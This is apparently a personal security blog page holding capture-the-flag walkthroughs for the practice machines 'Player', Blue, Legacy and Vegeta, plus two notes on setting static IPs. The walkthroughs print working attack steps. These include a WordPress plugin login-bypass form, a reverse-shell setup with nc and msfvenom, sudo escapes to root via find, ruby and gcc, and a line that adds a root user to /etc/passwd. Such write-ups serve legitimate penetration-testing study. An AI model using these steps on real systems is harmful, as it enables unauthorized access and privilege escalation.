How I took down ‘Player’ machine from vulnhub


Target Machine IP Address:  
My Machine IP Address:


Boot to Root
1. To get user flag
2. To get root flag
3. To get root access





You can download the machine from here.


Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0

Target Machin IP:

I will do a shortcut here, because I did this machine twice, one with nmap and other without it (but did a random way).  I visit the IP and it shows a default apache index file. (even after doing nmap, I was force to visit the IP to check whether any website is hosted)

It was during lunch break and I used to bring my own lunch tiffin, so it helps to have myself around 40 minutes of leisure break. So, I read the index file (because after this only MySQL server is running so I thought if it’s mysql related issue I will do it at room because I can have a good time after the office hour)

Ops, guess what I found.

There is a folder named g@web at /var/www/html. I visited there and came to know that there is a WordPress website is running there.

Usually, I like to enumerate user name or WordPress by passing /?author=1 like it is shown in the screenshot below

Yes, it revealed to me that there is a website username wp-local (if developer didn’t reassigned the ID to users, it is quite certain that ID=1 is the admin user). And it also puked a password hackNos@9012!!

I was very excited and tried the credentials and it appears that the password is not for the user wp-local. 

Since the website is WordPress, so that why not run wpscan.

wpscan --stealthy --url --plugins-detection aggressive -o wp-scan.log

If we read carefully the highlighted area, you will understand the website is running wp-support-plus-responsive-ticket-system plugin. The latest version is 9.1.2 and if you read the readme section just beneath that link, the current running plugin is version is 7.1.3.

By googling, I was directed to the corresponding exploit-db.

Yes, the selected line is the PoC (proof-of-concept) or the exploit.

<form method="post" action="">
  Username: <input type="text" name="username" value="administrator">
  <input type="hidden" name="email" value="sth">
  <input type="hidden" name="action" value="loginGuestFacebook">
  <input type="submit" value="Login">

If you have read carefully the articles written in exploit-db, you will understand that this vulnerability is due to incorrect usage of wp_set_auth_cookie() function, because of which you don’t require password to login.

As soon as you enter, it will show a white blank page, don’t worry, just remove everything after {url}/wp-admin , you are in

Usually, I liked to hide my reverse shell in 404.php. It didn’t work, so I switched my place and place the code in plugin called Hello Dolly.

By the way, you can get the reverse shell from the pentestmonkey website or github page. Besides, if you don’t want to download and you are using Kali Linux, then you can copy the shell from  /usr/share/webshells/php/php-reverse-shell.php to the place of your choice.

And modify the reverse IP address and port number.

And then you need to setup your (kali or the attacker) machine to receive reverse connection

nc -lvp 1234

Then all you need to do is active the Hello Dolly plugin

Guess what? You got a reverse connection on your Kali Linux Machine

Usually at this stage I like to run which python or which python3 command, because if it shows something like /usr/bin/python2 or /usr/bin/python3, which means pythons is available. Then I use that to make the shell interactive.

which python3 
python3 -c "import pty;pty.spawn('/bin/bash')";
export TERM=xterm     #this command help us to make the clear command work, which I really like
id  # to know which user we are running in

Usually you can run command like cat /etc/passwd to know all the users, but this time I go little lazy

See, we got username

1. hackNos-boat
2. hunter
3. security

The reason why I am little concern about username is because we got a password hackNos@9012!!  during the enumeration or information gathering stage.

I tried one by one, and username security accepted the password hackNos@9012!!

I was very happy, I ran few commands like find to find whether any SUID or SGID binaries were there, but didn’t get anything.

Then guess what?

sudo -l 

Then I quickly did little shopping from gtfobins

sudo -u hackNos-boat find . -exec /bin/sh \; -quit

sudo -l

sudo -u hunter ruby -e 'exec "/bin/sh"'

sudo -l

sudo gcc -wrapper /bin/sh,-s .

We got root now!!

Now we need to find the flags, for user flag.. I again did a lazy step lol

cd home;ls -lah

cat hunter/user.txt # we got the user flag!!

For root flag,

cat /root/root.txt


That’s all guys…

I was writing this blog around 5:15PM and completed at 6:16PM.  Wish you all a productive time too 🙂




No Comments

How to setup Static IP address on ubuntu server 20.04


sudo vim /etc/netplan/00-installer-config.yaml
# This is the network config written by 'Samdup'
version: 2
renderer: networkd 
dhcp4: true
dhcp4: no
dhcp6: no
addresses: [,]
addresses: [,


sudo netplan apply 
No Comments

How to setup static IP addresse on RHEL8 or CentOs

Although there are many benefits of assigning static IP address to a machine, it really helps me to stay organized and can monitor my machines with more convenience. Besides, it became a habit that whenever I have to access machines from Vmware or VirtualBox, I like to SSH to it from my host machine. So, in this article I will share how to set a static IP address to your machine without using any Graphical Tools (because 99.9% of the servers which I had worked have no GUI, moreover I enjoy the power it caters).


Assign a Static IP address using following information (you can alter it based on your Host-only Network IP address)
IP address:
Default Gateway:
Netmask: 255:255:255:0

I ran a ifconfig on my machine. You can clearly see that I have two Network Interface (ifname) slots and one is empty (i.e. ens192) (By the way, you can click on the image to magnify the view)


First, let’s run

nmcli c s

nmcli is the networking management tool or the package we are going to use (although nmtui is a great option but it may not be available on all the server)

c is the shorthand of connection

s is to show

To know the interface name and other details…

Yes. the above command did help us to confirm our understanding which we inferred from the ifconfig result.

Here we go

nmcli connection add con-name lab ifname ens192 type ethernet autoconnect yes ipv4.addresses ipv4.dns ipv4.method manual


Although you can understand what each flag does by simple doing a man nmcli , let me do a little explanation just to have a grab of the concept for myself.

We are adding (add) a new connection name (con-name) called lab on the network interface (ifname) ens192, which connects automatically with IP address (and netmask using nmcli package.

Method manual means it is a static IP assignment. Until we explicitly change the IP address, it won’t get like how we experience with our home devices (which are on DHCP).

nmcli connection lab up

It appears that the new connection is ready despite we don’t run the aforementioned command, however, I like to run it (because I am afraid it may not be the case in an exam environment or real server that you will have to manage).

To verify the result…


We got IP address and Netmask correct

cat /etc/resolv.conf

We got DNS correct

However, we did get the Gateway configured.

route -n

It is indeed bless in disguise because we got the opportunity to learn how to edit the value in case we need in the future. I know the command is something to do with edit so, let me know quickly run a man nmcli

The above screenshot is nothing but the output of man command.

Method 1

nmcli connection edit type ethernet con-name lab

It will prompt you an interactive shell. You have to choose set option


then press q to exit and save.

Method 2  (Referred from this site)

I really like this command more. It’s simple and easy to get the jobs done

nmcli connection modify lab ipv4.gateway

To verify:

route -n

Combined output result is in the screenshot

Finally we have to reboot the machine and check whether it is working fine or not.

Yes, everything is working perfect and just to confirm you about the Gateway, I enclosed the result in here.

route -n


No Comments

Taking down Blue (a window machine), without using Metasploit

Today I am going to take down a machine called ‘Blue’. It’s a window 7 based machine. I didn’t expect that I could pwn the machine quite easily… Anyway, here is my walkthrough of it. By the way, it is not necessary mean that it is the sole way to compromise the machine. Ok enough said, let’s do some work…

nmap -sC -sV -o nmap1.log
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
nmap --script smb-vuln* -o smb-vuln.log
Nmap scan report for Host is up (0.43s latency). 
Not shown: 991 closed ports PORT STATE SERVICE 
135/tcp open msrpc 139/tcp open netbios-ssn 
445/tcp open microsoft-ds 
49152/tcp open unknown 
49153/tcp open unknown 
49154/tcp open unknown 
49155/tcp open unknown 
49156/tcp open unknown 
49157/tcp open unknown 

Host script results: 
|_smb-vuln-ms10-054: false 
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND 
| smb-vuln-ms17-010: 
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) 
| IDs: CVE:CVE-2017-0143 
| Risk factor: HIGH 
| A critical remote code execution vulnerability exists in Microsoft SMBv1 
| servers (ms17-010).

After googling, I find this repository has everything you need for MS17-010 (aka eternal blue)

git clone

cd MS17-010

We need to develop a simple exploit (which could create reverse connection back from Window 7 machine to our Kali Linux machine). Remember, we are never going to depend on Meterpreter shell which is not allowed in the exam therefore, in lieu of aforementioned shell, I am going to use the shell_reverse_tcp shell.

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1337 -f exe > blue.exe

I don’t think you require me to explain what those option does because I have done it in my previous post. It is here.

Although MS17-010 contains the exploit but I didn’t use that, instead I did manually went to search an exploit from exploit-db

searchsploit MS17-010

cp /usr/share/exploitdb/exploits/windows/remote/ .

Then we need to modify the exploit code. (I have highlighted the line where it is required to modify)

You need to place the guest username (perhaps you can see either from nmap result or following command can help you to understand there is a guest user). By the way, there is a two way to fill the guest user. One is conventional way to place username as guest and other way is simply filling the place by // (yes two forward slashes in between the quote).

Once modification is done then follow the following steps..

I used to divide the Terminal by using tmux and, in one shell you need to wait the reverse connection from the Window Machine.

nc -lvp 1234

And on another shell


Once you are successful, you will get the system32 prompt like the screenshot below..

User flag (remember type in window command is same as cat in Linux – I know this claim is too much but let us be like this for time being)

Finally the root flag…

No Comments

Taking down Legacy (A Window Machine) without using Metasploit

Hello guys,
Today I am going to take down one simple box from Hack The Box. Recently I purchased a VIP lab access. By the way, the machine name is called Legacy and it’s a window machine.

This is my first write-up of machines from that lab.

Since we already have the machine IP address (it’s shown in the web portal), let’s check what ports are open and what services are running..


Machine IP:
Kali Linux :

1. To get the user flag
2. To get the root flag

Information Gathering Phase:

nmap -sC -sV -Pn
Nmap scan report for
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

From the above result, we can conclude that the target machine is running Window XP and, it has port 139 and 445 opened. Besides, it is running Samba server.

If you want to know more, you can also perform the above command with -v option. (However, the screenshot attached was the result of command without the -v option)

nmap -sC -sV -v -p139,445 -o nmap.log -Pn

Based on the above result, we are certain that this Samba version is vulnerable. However, the following NSE script (nmap script) can help us to get a better vulnerability detail and, it will also recommend related exploits if it has any.

nmap --script smb-vuln* -o nmap_smb_vul.log -Pn
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms08-067:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
| Disclosure date: 2008-10-23
| References:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
| Disclosure date: 2017-03-14
| References:

You can clearly see that it has suggested two exploits however, since the first exploit is having some issue (which I colored red) therefore, I am going to use the second exploit. (Note: I must share with you that it is not absolute approach, because sometimes a minor changes in the exploit might work, so try to fix the issues of the first exploit if time permits you).

Although I found many exploits regarding MS17-010, I am going to do it without using Metasploit (which is a powerful automating framework or tool). So let’s do some shopping through online.

We are going to clone a GitHub link… (there will be many GitHub account having the exploit details of MS17-010. But, we need one with “send script” ( to send the exploit from our Host Machine (Kali Linux) to that Remote Machine(Window Machine). Since many GitHub repository doesn’t have the script therefore I am emphasizing about it. Perhaps if you read further you might get to know the importance of it)

git clone

cd MS17-010

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=1234 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe

I was little skeptical using msfvenom at the beginning as in the OSCP exam, we are allowed to use Metasploit only twice (and my plan is not to use any). Nevertheless, after reading couple of blogs of senior OSCPians, I understood we can use msfvenom and they discouraged to use Meterpreter.

-p payload 
LHOST localhost 
LPORT Local Port 

I might need to explain a little regarding EXITFUNC=thread 
-  This EXITFUNC option effectively sets a function hash in the payload that specifies a DLL and function to call when the payload is complete. 
- thread method is used in most exploitation scenarios where the exploited process (e.g. IE) runs the shellcode in a sub-thread and exiting this thread results in a working application/system (clean exit) 
- To know more, kindly visit this link 

-f output format 
-a architecture 
-o output file and path

If you have observed carefully, you might have noticed that our exploit MS17-010.exe (is using payload windows/shell_reverse_tcp) will provide us a reverse connection to our Kali Linux Machine (or Local Host) on LPORT 1234.

Therefore, I will wait a reverse connection to my LHOST at LPORT 1234.

nc -lvp 1234

And on another Terminal (remember to cd ms17-010 folder if you are freshly opening a Terminal), perform the following command. (By the way, I highly recommend you to use tmux tool to split the terminal to enhance your productivity)

python ms17-010.exe

Yes, if you are successful; on your terminal (which was listening at port 1234 will get the reverse connection), you will see like the following screenshot. (Focus on the highlight area)

I will not bore you with my English (Tibetish lol), so I have attached the following steps in screenshot.

That’s all guys … See you in the next post 🙂

My approach to Vegeta Machine


Target Machine IP Address:  
My Machine IP Address:


Boot to Root




You can download the machine from here.


Information Gathering & Scanning Process:

sudo arp-scan --interface=eth0

nmap -sC -sV -p- -o nmap.log

22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))

I checked source code, exiftool on image but didn’t get a good result, so I will not write those processes here (afraid it may bog you down with rabbit holes.) However, something interesting is showing at robots.txt

Note: Don’t just stop there, I missed it once.. look at the line number, something must be at the bottom


Yes, this is base64. We need to decode it.

If you wonder why I did double decoding, you might understand it by doing it with single decoding. Because output of the base64 decoded message is another base64 decoded text, therefore, I did it twice.

The decoded file is actually a PNG file, do you see the PNG in the top of the screenshot?

I have redirected the output and named the file decoded.png

It is a QR Code. Now I need to do a little shopping. Find an online tool that could read the code and spit out the message if it has any… By the way, I tried my mobile QR reader and I already got the message, however, let’s do the usual way…

I am going to use this tool to decode the message:

Password:: topshellv

However, I did Scan with Nikto and Gobuster, both gave me some information, nevertheless, so far it appears to be another rabbit hole to me though 🙂

As you can see very well that directory redirects to somewhere (which are not known yet, I am planning to run a burp suite to look into it.)

In Nikto result, there is a link which intrigued me, nevertheless, I am not sure whether it is again a rabbit hole, however, let’s keep it in our note.

I must confess here that I was not able to get anything that could be of use. So, I had to peek other people’s writeup. The author of the writeup used another custom wordlist which is not there in the list of directory database which we use normally. Therefore, I think we really need to keep this in my that if a scanner can find nothing that doesn’t mean nothing is there.

Actually, I can add the bulma word in the dictionary and act as if I find the directory using the scanner but I don’t think that is the way.

Anyway, let’s proceed with the directory

I am impressed with this audio file because it contents Mores Code. (I don’t know how to read the Mores Code manually, however, we can find a tool for that)

Tools to decode mores audio file: Click Here.

We got username: trunks 
password: u$3r

If you run this command, you will get to know which (system) files you could write (or modify).

find / -writable -type d 2>/dev/null

There were so many, files that I could edit. I did a quick brush. However, the last file atracks me the most.


Let’s modify this file using the findings…

echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd 
which means we added a user name Tom and the password is Password@973 

su Tom 
cat root.txt

That’s it, guys… if you don’t like to enumerate manually you can use tool to enumerate the box for you…

Additional Note:

I upload to our target machine from my Kali Machine using SimpleHTTPServer (by the way, in order to save some time, I aliased the command with up).